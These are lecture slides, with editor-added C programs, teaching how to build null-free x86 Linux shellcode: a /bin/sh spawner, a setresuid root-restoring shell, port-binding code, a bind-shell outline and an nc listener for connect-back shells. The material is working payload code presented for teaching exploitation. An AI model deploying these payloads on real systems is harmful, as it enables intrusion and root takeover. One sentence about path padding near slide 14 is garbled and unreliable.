Computer Network Attack and Defense Technology: Lecture 5

Uploaded by: cn****1  Document ID: 570169875  Uploaded: 2024-08-02  Format: PPT  Pages: 28  Size: 249.50KB

Slide 1: Computer Network Attack and Defense Technology, Lecture 5

Slide 2: Outline
- Assembly language
- Shellcode
- From C to assembly to shellcode
- Shell-spawning shellcode
- Port-binding shellcode
- Connect-back shellcode

Slide 3: Shellcode
Shellcode is the exploit payload: architecture-specific machine instructions, written in assembly language and then assembled into machine code, so a different shellcode is needed for each architecture. It is a self-contained program that gives the attacker absolute control over the exploited process and can do anything the attacker wants, for example:
- spawn a shell
- open a port/service for the attacker
- open a connection back to the attacker
- add an account to /etc/passwd
- remove lines from syslog

NOP sled: a typical exploit buffer is a NOP sled, then the shellcode, then the return address repeated many times so that one copy overwrites the saved return address. The guessed address only has to land somewhere in the sled; execution slides down the NOPs into the shellcode.

Slide 4: From C to assembly
helloworld.c:

    #include <stdio.h>

    int main(void)
    {
        printf("Hello World.\n");
        return 0;
    }

Every Linux system call is enumerated, so it can be referenced by number when making the call from assembly (see linux_system_call.pdf).

Slide 5: From C to assembly
In Intel (x86) assembly a system call is made with the int instruction, which sends an interrupt signal to the kernel; int 0x80 is the Linux system-call interrupt. It uses four registers: EAX holds the system call number, and EBX, ECX and EDX hold the first, second and third arguments (further arguments go in ESI, EDI and EBP). helloworld.asm:

    section .data                    ; data segment
    msg db "Hello, world!", 0x0a     ; the string and a newline character
    section .text                    ; text segment
    global _start                    ; default entry point for ELF linking
    _start:
        ; SYSCALL: write(1, msg, 14)
        mov eax, 4                   ; put 4 into eax, since write is syscall #4
        mov ebx, 1                   ; put 1 into ebx, since stdout is fd 1
        mov ecx, msg                 ; put the address of the string into ecx
        mov edx, 14                  ; put 14 into edx, since the string is 14 bytes
        int 0x80                     ; call the kernel to make the system call happen
        ; SYSCALL: exit(0)
        mov eax, 1                   ; put 1 into eax, since exit is syscall #1
        mov ebx, 0                   ; exit with success;
                                     ; only one argument, so ecx and edx are not set
        int 0x80                     ; do the syscall

Slide 6: Assembly code to executable code
The assembly code needs to be assembled:

    nasm -f elf helloworld.asm

The -f elf option assembles helloworld.asm into an object file (helloworld.o) ready to be linked into an ELF executable; ld helloworld.o then generates the executable a.out. It works, but it is not shellcode. Shellcode must be self-contained and must not require linking: it is injected into a running program rather than run as a standalone executable, so it cannot declare a data layout (no .data section), it must be position-independent, and it must be ready to take over the processor whatever state the process is in.

Slide 7: Stack-based shellcode
The stack instructions are push, pop, call and ret. Stack-based exploits are possible because of call and ret: call pushes the return address and ret pops it into EIP, so if the stored return address on the stack is overwritten before the ret instruction executes, the program is redirected. The same mechanism provides position-independent data: a string placed directly after a call instruction has its address pushed onto the stack as the "return address", where the called code can pop it.

Slide 8: Helloworld1.s
This version uses no memory segment and will not be linked into an executable; it can be injected into an existing process and runs in a position-independent way. Will it work as shellcode? (not_working_shellcode.pdf)

    BITS 32                          ; tell nasm this is 32-bit code
    call mark_below                  ; call below the string to the instructions
    db "Hello, world!", 0x0a, 0x0d   ; with newline and carriage return bytes
    mark_below:
    ; ssize_t write(int fd, const void *buf, size_t count);
    pop ecx                          ; pop the return address (string pointer) into ecx
    mov eax, 4                       ; write syscall #
    mov ebx, 1                       ; STDOUT file descriptor
    mov edx, 15                      ; length of the string (13 characters plus 0x0a, 0x0d)
    int 0x80                         ; do syscall: write(1, string, 15)
    ; void _exit(int status);
    mov eax, 1                       ; exit syscall #
    mov ebx, 0                       ; status = 0
    int 0x80                         ; do syscall: exit(0)

Slide 9: Why doesn't it work?
Injected shellcode cannot simply be loaded and stepped through in gdb, but a core file can be used to debug it: when the program crashes, the kernel dumps the running program's memory, registers and other information into the core file, and gdb can show its contents.

(why_shellcode_not_working.pdf) Root cause: the shellcode contains null bytes, and the way it is delivered treats it as a C string. A null byte terminates a string, so a shell variable or a strcpy()-style copy stops at the first 0x00 (the slide puts it as: the shell removes the null bytes from the shellcode), and the truncated machine code is unusable. The null bytes have to be removed.

Slide 10: Removing null bytes, trick 1
Use a short jump, and jump back instead of forward: a forward call to mark_below has a small positive displacement encoded as a 32-bit immediate (0x0000000f), i.e. three null bytes, whereas a backward call has a negative displacement whose high bytes are 0xff. helloworld2.s still has null bytes, in the mov instructions (why_shellcode_not_working.pdf):

    BITS 32                          ; tell nasm this is 32-bit code
    jmp short one                    ; jump down to a call at the end
    two:
    ; ssize_t write(int fd, const void *buf, size_t count);
    pop ecx                          ; pop the return address (string pointer) into ecx
    mov eax, 4                       ; write syscall #
    mov ebx, 1                       ; STDOUT file descriptor
    mov edx, 15                      ; length of the string
    int 0x80                         ; do syscall: write(1, string, 15)
    ; void _exit(int status);
    mov eax, 1                       ; exit syscall #
    mov ebx, 0                       ; status = 0
    int 0x80                         ; do syscall: exit(0)
    one:
    call two                         ; call back upwards to avoid null bytes
    db "Hello, world!", 0x0a, 0x0d   ; with newline and carriage return bytes

Slide 11: Removing null bytes, trick 2
Change to equivalent instructions that do not encode 32-bit immediates:
- register width: use ax, bx, cx, dx or al, ah, bl, bh, cl, ch, dl, dh instead of the full register (mov eax, 4 is B8 04 00 00 00; mov al, 4 is B0 04)
- addressing: jmp short uses an 8-bit displacement
- use xor reg, reg to clear a register instead of mov reg, 0
- use inc/dec to increase or decrease a register by one
Now all null bytes are removed (working_shellcode.pdf). helloworld3.s:

    BITS 32                          ; tell nasm this is 32-bit code
    jmp short one                    ; jump down to a call at the end
    two:
    ; ssize_t write(int fd, const void *buf, size_t count);
    pop ecx                          ; pop the return address (string pointer) into ecx
    xor eax, eax                     ; zero out the full 32 bits of eax
    mov al, 4                        ; write syscall #4 into the low byte of eax
    xor ebx, ebx                     ; zero out ebx
    inc ebx                          ; increment ebx to 1, STDOUT file descriptor
    xor edx, edx                     ; zero out edx
    mov dl, 15                       ; length of the string
    int 0x80                         ; do syscall: write(1, string, 15)
    ; void _exit(int status);
    mov al, 1                        ; exit syscall #1; the top 3 bytes of eax are
                                     ; still zero because write() returned 15
    dec ebx                          ; decrement ebx back down to 0 for status = 0
    int 0x80                         ; do syscall: exit(0)
    one:
    call two                         ; call back upwards to avoid null bytes
    db "Hello, world!", 0x0a, 0x0d   ; with newline and carriage return bytes

Caveat on the exit: mov al, 1 only yields eax = 1 because the preceding write() returned a small byte count and left the upper three bytes of eax zero. If that syscall failed, eax would hold a negative errno with upper bytes 0xff and the "exit" would turn into an unrelated syscall number; an extra xor eax, eax before mov al, 1 costs two bytes and removes the dependency.
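The following C program is an added example by the editor, not code from the lecture: it scans a shellcode byte string for bytes that the delivery channel would swallow and reports how much of it a strcpy()-style copy would actually deliver. The two byte arrays are the editor's hand-assembled 32-bit x86 encodings of the helloworld1.s and helloworld3.s listings (constructed sample input, not nasm output from the course; the encodings are standard but should be checked with nasm before relying on them). It goes beyond the slides in one way: the bad-byte set is a parameter, so the same scan shows that helloworld3.s, although null-free, still contains 0x0a and 0x0d in its string, which matters when the shellcode has to pass through a line-based reader such as the recv_line function discussed with tinyweb later in the lecture.

```c
#include <stddef.h>
#include <stdio.h>

/* helloworld1.s as hand-assembled by the editor: forward call and 32-bit
 * immediates produce many 0x00 bytes. */
static const unsigned char hello1[] = {
    0xE8, 0x0F, 0x00, 0x00, 0x00,               /* call mark_below (+15)   */
    'H','e','l','l','o',',',' ','w','o','r','l','d','!', 0x0a, 0x0d,
    0x59,                                       /* pop ecx                 */
    0xB8, 0x04, 0x00, 0x00, 0x00,               /* mov eax, 4              */
    0xBB, 0x01, 0x00, 0x00, 0x00,               /* mov ebx, 1              */
    0xBA, 0x0F, 0x00, 0x00, 0x00,               /* mov edx, 15             */
    0xCD, 0x80,                                 /* int 0x80                */
    0xB8, 0x01, 0x00, 0x00, 0x00,               /* mov eax, 1              */
    0xBB, 0x00, 0x00, 0x00, 0x00,               /* mov ebx, 0              */
    0xCD, 0x80                                  /* int 0x80                */
};

/* helloworld3.s as hand-assembled by the editor: short jump, backward call,
 * 8-bit registers, xor/inc/dec; no 0x00 byte anywhere. */
static const unsigned char hello3[] = {
    0xEB, 0x13,                                 /* jmp short one (+19)     */
    0x59,                                       /* two: pop ecx            */
    0x31, 0xC0,                                 /* xor eax, eax            */
    0xB0, 0x04,                                 /* mov al, 4               */
    0x31, 0xDB,                                 /* xor ebx, ebx            */
    0x43,                                       /* inc ebx                 */
    0x31, 0xD2,                                 /* xor edx, edx            */
    0xB2, 0x0F,                                 /* mov dl, 15              */
    0xCD, 0x80,                                 /* int 0x80                */
    0xB0, 0x01,                                 /* mov al, 1               */
    0x4B,                                       /* dec ebx                 */
    0xCD, 0x80,                                 /* int 0x80                */
    0xE8, 0xE8, 0xFF, 0xFF, 0xFF,               /* one: call two (-24)     */
    'H','e','l','l','o',',',' ','w','o','r','l','d','!', 0x0a, 0x0d
};

/* Bad-byte sets: what a C string copy stops at, and what a line-based
 * reader treats as end of line. */
static const unsigned char BAD_NULL[] = { 0x00 };
static const unsigned char BAD_CRLF[] = { 0x0a, 0x0d };

/* Number of bytes in buf that belong to the bad set. */
size_t count_bad_bytes(const unsigned char *buf, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) { hits++; break; }
    return hits;
}

/* How many bytes a strcpy()-style copy delivers: everything up to the first
 * 0x00, which is the whole buffer only when the shellcode is null-free. */
size_t strcpy_delivered_length(const unsigned char *buf, size_t len)
{
    size_t i = 0;
    while (i < len && buf[i] != 0x00)
        i++;
    return i;
}

/* Print a summary plus the offset of every null byte. */
static void report(const char *name, const unsigned char *buf, size_t len)
{
    printf("%s: %zu bytes, %zu null bytes, %zu CR/LF bytes; strcpy() delivers %zu bytes\n",
           name, len, count_bad_bytes(buf, len, BAD_NULL, 1),
           count_bad_bytes(buf, len, BAD_CRLF, 2), strcpy_delivered_length(buf, len));
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            printf("  null byte at offset %zu\n", i);
}

int main(void)
{
    report("helloworld1", hello1, sizeof hello1);
    report("helloworld3", hello3, sizeof hello3);
    return 0;
}
```

Run it and helloworld1 shows 19 null bytes with the first one at offset 2, inside the call instruction's displacement, so a string copy would deliver just two bytes of it; helloworld3 has none and is delivered whole, but the scan with the CR/LF set still flags the two bytes in its string.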

Slide 12: Shell-spawning shellcode
To spawn a shell, just make the system call that executes the /bin/sh shell program: system call number 11, execve().

    int execve(const char *filename, char *const argv[], char *const envp[]);

    #include <unistd.h>

    int main(void)
    {
        char filename[] = "/bin/sh\x00";
        char *argv[2], *envp[1];   /* arrays that contain char pointers */
        argv[0] = filename;        /* the only argument is the filename */
        argv[1] = 0;               /* null-terminate the argument array */
        envp[0] = 0;               /* null-terminate the environment array */
        execve(filename, argv, envp);
        return 0;                  /* only reached if execve() fails */
    }

Slide 13: Shell-spawning shellcode in assembly
lea (load effective address) works like the & operator in C; [ebx+8] dereferences ebx+8 as a pointer. Total: 45 bytes. exec_shell.s:

    BITS 32
    jmp short two                    ; jump down to the bottom for the call trick
    one:
    ; int execve(const char *filename, char *const argv[], char *const envp[])
    pop ebx                          ; ebx has the address of the string
    xor eax, eax                     ; put 0 into eax
    mov [ebx+7], al                  ; null-terminate the /bin/sh string (overwrites the X)
    mov [ebx+8], ebx                 ; put the string address where the AAAA is (argv[0])
    mov [ebx+12], eax                ; put a 32-bit null terminator where the BBBB is (argv[1])
    lea ecx, [ebx+8]                 ; load the address of ebx+8 into ecx for the argv pointer
    lea edx, [ebx+12]                ; edx = ebx + 12, the envp pointer (an empty array)
    mov al, 11                       ; syscall #11
    int 0x80                         ; do it
    two:
    call one                         ; use a call to get the string address
    db "/bin/shXAAAABBBB"            ; the X, AAAA and BBBB bytes are only placeholders
                                     ; that get overwritten at run time

Because the placeholders are overwritten in place, this shellcode only works where it sits in writable memory (a stack or heap buffer).

Slide 14: Shellcode optimization
The smaller, the better. Remove the unneeded XAAAABBBB placeholders, use the registers more efficiently, and build the string and the arrays with push instead of writing into memory. tiny_shell.s:

    BITS 32
    ; execve(const char *filename, char *const argv[], char *const envp[])
    xor eax, eax                     ; zero out eax
    push eax                         ; push some nulls for string termination
    push 0x68732f2f                  ; push "//sh" onto the stack
    push 0x6e69622f                  ; push "/bin" onto the stack
    mov ebx, esp                     ; put the address of "/bin//sh" into ebx, via esp
    push eax                         ; push a 32-bit null terminator onto the stack
    mov edx, esp                     ; this is an empty array for envp
    push ebx                         ; push the string address onto the stack above the null terminator
    mov ecx, esp                     ; this is the argv array with the string pointer
    mov al, 11                       ; syscall #11
    int 0x80                         ; do it: execve("/bin//sh", ["/bin//sh", NULL], [NULL])

The string is "/bin//sh" rather than "/bin/sh" so that it fills exactly two 4-byte pushes without a null byte in the immediates; the kernel treats the doubled slash as a single one. The terminating null comes from the register push, not from an immediate.
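The immediates 0x68732f2f and 0x6e69622f in tiny_shell.s are just the bytes of "/bin//sh" read as little-endian dwords, and the doubled slash is what makes the length a multiple of four. The program below is an added example by the editor, not course code, that generalises the trick: it pads any absolute path by inserting extra slashes after its last '/', emits the dwords in push order (last four bytes first), and checks that none of them contains a null byte. The function names and the 16-dword limit are the editor's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_DWORDS 16   /* editor's limit: paths up to 64 bytes */

/* Pad path to a multiple of 4 bytes by inserting '/' characters right after
 * its last '/', then write the 32-bit little-endian immediates into out[] in
 * push order (the last four bytes of the padded string come first, so that
 * after the pushes esp points at the start of the string). Returns the
 * number of dwords, or 0 if the path has no '/' or does not fit. */
size_t pack_path_pushes(const char *path, uint32_t *out, size_t max)
{
    char padded[4 * MAX_DWORDS + 1];
    size_t len = strlen(path);
    size_t pad = (4 - len % 4) % 4;
    const char *last = strrchr(path, '/');
    if (last == NULL || len + pad > 4 * MAX_DWORDS || (len + pad) / 4 > max)
        return 0;
    size_t head = (size_t)(last - path) + 1;   /* bytes up to and including the last '/' */
    memcpy(padded, path, head);
    memset(padded + head, '/', pad);            /* "//" is the same path as "/" to the kernel */
    memcpy(padded + head + pad, path + head, len - head);
    size_t total = len + pad;
    padded[total] = '\0';

    size_t n = total / 4;
    for (size_t i = 0; i < n; i++) {
        const unsigned char *p = (const unsigned char *)padded + total - 4 * (i + 1);
        out[i] = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
                 (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    }
    return n;
}

/* True if any immediate contains a 0x00 byte (a path with a non-ASCII or
 * control character would; plain ASCII paths never do). */
int pushes_have_null(const uint32_t *v, size_t n)
{
    for (size_t i = 0; i < n; i++)
        for (int s = 0; s < 32; s += 8)
            if (((v[i] >> s) & 0xff) == 0)
                return 1;
    return 0;
}

/* Small wrappers so callers can query a single path. */
size_t push_count(const char *path)
{
    uint32_t v[MAX_DWORDS];
    return pack_path_pushes(path, v, MAX_DWORDS);
}

uint32_t nth_push(const char *path, size_t i)
{
    uint32_t v[MAX_DWORDS];
    size_t n = pack_path_pushes(path, v, MAX_DWORDS);
    return i < n ? v[i] : 0;
}

int path_pushes_null_free(const char *path)
{
    uint32_t v[MAX_DWORDS];
    size_t n = pack_path_pushes(path, v, MAX_DWORDS);
    return n > 0 && !pushes_have_null(v, n);
}

int main(void)
{
    const char *paths[] = { "/bin/sh", "/bin/bash", "/usr/bin/id" };
    for (size_t k = 0; k < sizeof paths / sizeof paths[0]; k++) {
        uint32_t v[MAX_DWORDS];
        size_t n = pack_path_pushes(paths[k], v, MAX_DWORDS);
        printf("%s (%zu pushes, null-free: %s)\n", paths[k], n,
               pushes_have_null(v, n) ? "no" : "yes");
        for (size_t i = 0; i < n; i++)
            printf("    push 0x%08x\n", v[i]);
        printf("    mov ebx, esp\n");
    }
    return 0;
}
```

For "/bin/sh" it prints exactly the two pushes of tiny_shell.s; "/bin/bash" becomes "/bin////bash" and needs three pushes, the middle one being 0x2f2f2f2f. The same padding idea does not help with a path whose last component is shorter than the padding allows only if there is no slash at all, which is why the function refuses relative names like "sh".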

Slide 15: Restore privilege
Programs can lower their effective privileges with seteuid(uid_t euid) and setegid(gid_t egid). If a set-user-ID root program only dropped its effective ID, the saved set-user-ID is still 0, and shellcode can restore the privileges back to root by setting the real user ID, effective user ID and saved set-user-ID of the current process:

    int setresuid(uid_t ruid, uid_t euid, uid_t suid);
    int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

Slide 16: priv_shell.s

    BITS 32
    ; setresuid(uid_t ruid, uid_t euid, uid_t suid);
    xor eax, eax                     ; zero out eax
    xor ebx, ebx                     ; zero out ebx
    xor ecx, ecx                     ; zero out ecx
    xor edx, edx                     ; zero out edx
    mov al, 0xa4                     ; 164 (0xa4) for syscall #164
    int 0x80                         ; setresuid(0, 0, 0): restore all root privileges
    ; execve(const char *filename, char *const argv[], char *const envp[])
    xor eax, eax                     ; make sure eax is zeroed again (it holds the return value)
    mov al, 11                       ; syscall #11
    push ecx                         ; push some nulls for string termination
    push 0x68732f2f                  ; push "//sh" onto the stack
    push 0x6e69622f                  ; push "/bin" onto the stack
    mov ebx, esp                     ; put the address of "/bin//sh" into ebx, via esp
    push ecx                         ; push a 32-bit null terminator onto the stack
    mov edx, esp                     ; this is an empty array for envp
    push ebx                         ; push the string address onto the stack above the null terminator
    mov ecx, esp                     ; this is the argv array with the string pointer
    int 0x80                         ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

Slide 17: Further optimization
cdq sign-extends eax into edx:eax, so when eax is zero it zeroes edx as well; its machine code is 0x99, a single byte, instead of the two bytes of xor edx, edx. Changing

    xor eax, eax
    mov al, 0xb

to

    push BYTE 11
    pop eax

saves another byte (3 bytes instead of 4). The result is the smaller shellcode.s:

    BITS 32
    ; setresuid(uid_t ruid, uid_t euid, uid_t suid);
    xor eax, eax                     ; zero out eax
    xor ebx, ebx                     ; zero out ebx
    xor ecx, ecx                     ; zero out ecx
    cdq                              ; zero out edx using the sign bit from eax
    mov BYTE al, 0xa4                ; syscall 164 (0xa4)
    int 0x80                         ; setresuid(0, 0, 0): restore all root privileges
    ; execve(const char *filename, char *const argv[], char *const envp[])
    push BYTE 11                     ; push 11 onto the stack
    pop eax                          ; pop the dword 11 into eax
    push ecx                         ; push some nulls for string termination
    push 0x68732f2f                  ; push "//sh" onto the stack
    push 0x6e69622f                  ; push "/bin" onto the stack
    mov ebx, esp                     ; put the address of "/bin//sh" into ebx, via esp
    push ecx                         ; push a 32-bit null terminator onto the stack
    mov edx, esp                     ; this is an empty array for envp
    push ebx                         ; push the string address onto the stack above the null terminator
    mov ecx, esp                     ; this is the argv array with the string pointer
    int 0x80                         ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

Slide 18: Port-binding shellcode
First the C version (with the includes the slide omitted restored):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int main(void)
    {
        int sockfd, new_sockfd;   /* listen on sockfd, new connection on new_sockfd */
        struct sockaddr_in host_addr, client_addr;   /* my address information */
        socklen_t sin_size;
        int yes = 1;              /* unused here */

        sockfd = socket(PF_INET, SOCK_STREAM, 0);

        host_addr.sin_family = AF_INET;            /* host byte order */
        host_addr.sin_port = htons(31337);         /* short, network byte order */
        host_addr.sin_addr.s_addr = INADDR_ANY;    /* automatically fill with my IP */
        memset(&(host_addr.sin_zero), 0, 8);       /* zero the rest of the struct */

        bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
        listen(sockfd, 4);

        sin_size = sizeof(struct sockaddr_in);
        new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
        return 0;
    }

Slide 19: Port-binding shellcode: socketcall
Inside the 32-bit x86 Linux kernel, all socket-related functions go through a single system call:

    int socketcall(int call, unsigned long *args);

The possible call numbers are listed in socketcall.pdf; args points to an array holding the arguments of the wrapped function. Creating a listening server on port 31337 and accepting a TCP connection requires SYS_SOCKET (1), SYS_BIND (2), SYS_LISTEN (4) and SYS_ACCEPT (5).

Slide 20: bind_port.s

    BITS 32
    ; s = socket(2, 1, 0)
    push BYTE 0x66                   ; socketcall is syscall #102 (0x66)
    pop eax
    cdq                              ; zero out edx for use as a null DWORD later
    xor ebx, ebx                     ; ebx is the type of socketcall
    inc ebx                          ; 1 = SYS_SOCKET = socket()
    push edx                         ; build the arg array (in reverse): protocol = 0,
    push BYTE 0x1                    ; SOCK_STREAM = 1,
    push BYTE 0x2                    ; AF_INET = 2
    mov ecx, esp                     ; ecx = pointer to the argument array
    int 0x80                         ; after the syscall, eax has the socket file descriptor
    mov esi, eax                     ; save the socket FD in esi for later
    ; bind(s, [2, 31337, 0], 16)
    push BYTE 0x66                   ; socketcall (syscall #102)
    pop eax
    inc ebx                          ; ebx = 2 = SYS_BIND = bind()
    push edx                         ; build the sockaddr struct (in reverse order): INADDR_ANY = 0
    push WORD 0x697a                 ; PORT = 31337 in network byte order
    push WORD bx                     ; AF_INET = 2
    mov ecx, esp                     ; ecx = server struct pointer
    push BYTE 16                     ; args: sizeof(server struct) = 16,
    push ecx                         ; server struct pointer,
    push esi                         ; socket file descriptor
    mov ecx, esp                     ; ecx = argument array
    int 0x80                         ; eax = 0 on success
    ; listen(s, 4)
    mov BYTE al, 0x66                ; socketcall (syscall #102)
    inc ebx
    inc ebx                          ; ebx = 4 = SYS_LISTEN = listen()
    push ebx                         ; args: backlog = 4,
    push esi                         ; socket fd
    mov ecx, esp                     ; ecx = argument array
    int 0x80
    ; c = accept(s, 0, 0)
    mov BYTE al, 0x66                ; socketcall (syscall #102)
    inc ebx                          ; ebx = 5 = SYS_ACCEPT = accept()
    push edx                         ; args: socklen = 0,
    push edx                         ; sockaddr ptr = NULL,
    push esi                         ; socket fd
    mov ecx, esp                     ; ecx = argument array
    int 0x80                         ; eax = connected socket FD

Two details worth noticing: edx keeps its zero across the syscalls because int 0x80 only clobbers eax, and mov BYTE al, 0x66 is safe after bind() and listen() only because they returned 0 and left the upper bytes of eax zero. The pushed sockaddr is only 8 bytes (family, port, address); the remaining 8 bytes that bind() reads are whatever was already on the stack, which the kernel ignores for AF_INET.
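Why the port is pushed as 0x697a, and what the 16-byte struct really contains after only three pushes, is easier to see by replaying the pushes. The program below is an added example by the editor (not part of bind_port.s or the course): it simulates the downward-growing stack, performs the same push edx / push WORD 0x697a / push WORD bx sequence, and compares the result with a struct sockaddr_in filled in through the C API. It assumes a little-endian host and the Linux layout of struct sockaddr_in (family, port, address, sin_zero); the port_immediate and immediate_has_null helpers are the editor's own and also show which ports cannot be pushed this way without a null byte.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A small downward-growing stack image. Bytes above the initial esp are
 * filled with 0xAA to stand for whatever the process left on its stack. */
struct stack_image { unsigned char mem[48]; size_t esp; };

static void stack_init(struct stack_image *s)
{
    memset(s->mem, 0xAA, sizeof s->mem);
    s->esp = 32;                                 /* 16 bytes of "old stack" above esp */
}

static void push_dword(struct stack_image *s, uint32_t v)
{
    s->esp -= 4;
    memcpy(s->mem + s->esp, &v, 4);              /* little-endian host write */
}

static void push_word(struct stack_image *s, uint16_t v)
{
    s->esp -= 2;
    memcpy(s->mem + s->esp, &v, 2);
}

/* The WORD immediate for "push WORD imm" so that the two bytes at esp read
 * as htons(port): simply the port with its two bytes swapped. */
uint16_t port_immediate(uint16_t port)
{
    return (uint16_t)(((port & 0xff) << 8) | (port >> 8));
}

/* True if either byte of the immediate is 0x00, i.e. the port (below 256,
 * or a multiple of 256) cannot be pushed this way in null-free shellcode. */
int immediate_has_null(uint16_t imm)
{
    return (imm & 0xff) == 0 || (imm >> 8) == 0;
}

/* Build the struct exactly as bind_port.s does and copy the 16 bytes that
 * bind() will read into out. Returns how many of them the shellcode wrote. */
size_t shellcode_sockaddr(unsigned char out[16])
{
    struct stack_image s;
    stack_init(&s);
    size_t top = s.esp;
    push_dword(&s, 0);                           /* push edx: INADDR_ANY         */
    push_word(&s, port_immediate(31337));        /* push WORD 0x697a: port 31337 */
    push_word(&s, 2);                            /* push WORD bx: AF_INET        */
    memcpy(out, s.mem + s.esp, 16);
    return top - s.esp;                          /* 8 */
}

/* 1 if the first 8 bytes equal the C API's struct for port 31337 on
 * INADDR_ANY; sin_zero is not compared, the kernel does not look at it. */
int matches_c_struct(void)
{
    unsigned char sc[16];
    size_t written = shellcode_sockaddr(sc);
    struct sockaddr_in api;
    memset(&api, 0, sizeof api);
    api.sin_family = AF_INET;
    api.sin_port = htons(31337);
    api.sin_addr.s_addr = htonl(INADDR_ANY);
    return written == 8 && sizeof api == 16 && memcmp(sc, &api, 8) == 0;
}

int main(void)
{
    unsigned char sc[16];
    size_t written = shellcode_sockaddr(sc);
    printf("bytes at esp after the pushes (%zu written by the shellcode):", written);
    for (int i = 0; i < 16; i++)
        printf(" %02x", sc[i]);
    printf("\nmatches struct sockaddr_in: %s\n", matches_c_struct() ? "yes" : "no");
    printf("port 31337 -> push WORD 0x%04x; port 80 -> push WORD 0x%04x (null byte: %s)\n",
           port_immediate(31337), port_immediate(80),
           immediate_has_null(port_immediate(80)) ? "yes" : "no");
    return 0;
}
```

The dump starts 02 00 7a 69 00 00 00 00 and then shows eight 0xAA bytes: the family, port and address match the C struct byte for byte, and the rest is stale stack that bind() happily accepts for AF_INET. Port 80 turns into 0x5000, whose low byte is zero, so a bind shell on a low port needs a different way of getting the value into the struct.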

Slide 21: Port-binding shellcode
The shellcode above listens on port 31337 and accepts a new TCP connection, but by itself it is not useful: whoever connects cannot control anything, because no program is talking to the socket. Combined with the shell-spawning code it becomes a bind shell: swap the standard I/O file descriptors for the socket file descriptor before executing the shell. The dup and dup2 system calls duplicate file descriptors:

    int dup(int oldfd);              /* creates a copy of oldfd on the lowest free descriptor number */
    int dup2(int oldfd, int newfd);  /* makes newfd a copy of oldfd, closing newfd first if necessary */

Slide 22: The last version of the bind shell
Three parts (booksrc/bind_shell.s):
- socket-related code: socket, bind, listen and accept, as in bind_port.s
- duplicating file descriptors: dup2 the connected socket onto 0, 1 and 2 (socket data redirection)
- shell execution: execve("/bin//sh", ...) as in tiny_shell.s
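The second and third parts of the bind shell can be exercised without any network at all. The program below is an added example by the editor, not the course's bind_shell.s: one end of an AF_UNIX socketpair stands in for the accepted TCP socket, the child does exactly what the shellcode does after accept() (dup2 the socket onto 0, 1 and 2, then execve /bin/sh with the same argv and empty envp as tiny_shell.s), and the parent plays the attacker's netcat, writing a command into the socket and reading the shell's answer back. It assumes a POSIX system with /bin/sh; the function names are the editor's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* What the shellcode does once it holds the connected socket: point stdin,
 * stdout and stderr at it, then execve a shell. Never returns. */
static void attach_shell(int sock)
{
    char *argv[] = { "/bin/sh", NULL };   /* same argv as tiny_shell.s */
    char *envp[] = { NULL };              /* same empty envp */
    for (int fd = 0; fd <= 2; fd++)
        if (dup2(sock, fd) < 0)
            _exit(1);
    if (sock > 2)
        close(sock);                      /* tidy; the shellcode leaves it open */
    execve("/bin/sh", argv, envp);
    _exit(1);                             /* only reached if execve() failed */
}

/* Feed cmd to a shell whose descriptors 0/1/2 are the socket, exactly as an
 * attacker would type it into nc, and return everything the shell sent back
 * (caller frees). Returns NULL if the socketpair or fork fails. */
char *run_over_socket(const char *cmd)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return NULL;
    pid_t pid = fork();
    if (pid < 0)
        return NULL;
    if (pid == 0) {                       /* "victim" side */
        close(sv[0]);
        attach_shell(sv[1]);
    }
    close(sv[1]);                         /* "attacker" side */
    if (write(sv[0], cmd, strlen(cmd)) < 0)
        return NULL;
    shutdown(sv[0], SHUT_WR);             /* EOF on the shell's stdin makes it exit */

    char *buf = calloc(1, 4096);
    if (buf == NULL)
        return NULL;
    size_t got = 0;
    ssize_t n;
    while (got < 4095 && (n = read(sv[0], buf + got, 4095 - got)) > 0)
        got += (size_t)n;                 /* read until the shell closes the socket */
    close(sv[0]);
    waitpid(pid, NULL, 0);
    return buf;
}

/* 1 if the shell's output for cmd is exactly expected. */
int shell_answers(const char *cmd, const char *expected)
{
    char *out = run_over_socket(cmd);
    int ok = out != NULL && strcmp(out, expected) == 0;
    free(out);
    return ok;
}

int main(void)
{
    char *out = run_over_socket("echo connected; echo stderr-too 1>&2\n");
    if (out != NULL) {
        fputs(out, stdout);
        free(out);
    }
    return 0;
}
```

Both lines come back over the socket, the second one because stderr was redirected as well; redirect only stdin and stdout and error messages from the remote shell silently go to the victim's terminal instead of the attacker.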

Slide 23: Connect-back shellcode
Limitation of port binding: the port may be blocked by a firewall. Outbound connections are normally allowed, so after the system is compromised the attacker can instead have it connect back to the attacker's machine. Connect-back shellcode is the client side of the connection and only needs socket() and connect() (followed by the same dup2 redirection and shell execution).

Slide 24: Connect-back shellcode
- the netcat tool
- the tinyweb vulnerability
- connect-back shellcode
- using connect-back shellcode to exploit the tinyweb vulnerability

Slide 25: The netcat (nc) tool
A featured networking utility which reads and writes data across network connections using the TCP/IP protocol. It is a reliable back-end tool that can be used directly or driven by other programs and scripts, and a feature-rich network debugging and exploration tool that can create almost any kind of connection:
- outbound and inbound connections, TCP or UDP, to or from any port
- a tunneling mode that also allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel)
- built-in port-scanning capabilities, with randomizer
- advanced usage options such as buffered send mode (one line every N seconds) and hexdump (to stderr or to a specified file) of transmitted and received data
- optional RFC 854 telnet codes parser and responder
To wait for the connect-back on the attacker's machine: nc -v -l -p 31337 (netcat.txt).

